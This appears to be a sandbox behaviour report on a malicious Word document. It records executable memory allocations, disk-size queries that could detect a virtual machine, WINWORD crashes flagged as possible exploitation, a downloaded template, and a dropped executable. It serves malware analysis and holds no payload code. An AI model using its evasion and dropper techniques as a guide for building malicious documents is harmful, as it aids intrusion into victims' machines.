NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02672000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02682000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b01000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b02000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02683000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02684000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02707000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02705000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02685000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026fc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02686000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a81000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a82000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a83000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a84000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a85000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a86000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a87000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a88000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a89000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a8f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 13, 2022, 10 a.m.	process_identifier: 1620 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (2 events)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceW Dec. 13, 2022, 10 a.m.	number_of_free_clusters: 2226802 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: C:\ total_number_of_clusters: 8362495	1	1	0
GetDiskFreeSpaceExW Dec. 13, 2022, 10 a.m.	total_number_of_free_bytes: 9120980992 free_bytes_available: 9120980992 root_path: C:\ total_number_of_bytes: 34252779520	1	1	0

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process WINWORD.EXE with pid 2188 crashed
__exception__ Dec. 13, 2022, 10 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6ab133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21 SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6ab22074 SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x67c985c7 ??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28 DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d _MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x8007007b exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 127923140 registers.edi: 127923304 registers.eax: 127923140 registers.ebp: 127923220 registers.edx: 0 registers.ebx: 127924356 registers.esi: 2147942523 registers.ecx: 2147483648	1	0	0
__exception__ Dec. 13, 2022, 10 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x6ab133cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21 SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6ab23102 SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x67cbf7d0 ??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed ??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871 DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef _MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0 _MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab ??0OdfStgParams@@QAE@XZ+0xf1bd8 mso+0xff4ade @ 0x709c4ade DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0 _MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4 _MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b _MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a _MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41 _MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43 _GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37 _GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d _GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667 _GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169 _GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6 wdCommandDispatch-0x964 winword+0x1602 @ 0x2fe71602 wdCommandDispatch-0x9cc winword+0x159a @ 0x2fe7159a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 3392220 registers.edi: 3392384 registers.eax: 3392220 registers.ebp: 3392300 registers.edx: 0 registers.ebx: 3393436 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Application Crash

Process WINWORD.EXE with pid 2188 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Dec. 13, 2022, 10 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6ab133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6ab22074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x67c985c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

__exception__

Dec. 13, 2022, 10 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6ab133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6ab25dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6ab13b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6ab23102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x67cbf7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xf1bd8 mso+0xff4ade @ 0x709c4ade
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2fe71602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2fe7159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 3392220
registers.edi: 3392384
registers.eax: 3392220
registers.ebp: 3392300
registers.edx: 0
registers.ebx: 3393436
registers.esi: 3221549073
registers.ecx: 2147483648

Creates (office) documents on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\71D39FA7.dotm
file	C:\Users\test22\AppData\Local\Temp\~$이상민.docx
file	C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\o19wzg[1].dotm

Creates executable files on the filesystem (1 event)

file	C:\Users\Public\43et5rgr6hty6h76tuyr6t.exe

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Dec. 13, 2022, 10 a.m.	create_disposition: 5 (FILE_OVERWRITE_IF) file_handle: 0x00000458 filepath: C:\Users\test22\AppData\Local\Temp\~$이상민.docx desired_access: 0x40100080 (FILE_READ_ATTRIBUTES\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$이상민.docx create_options: 4194400 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT) status_info: 2 (FILE_CREATED) share_access: 0 ()	1	0	0

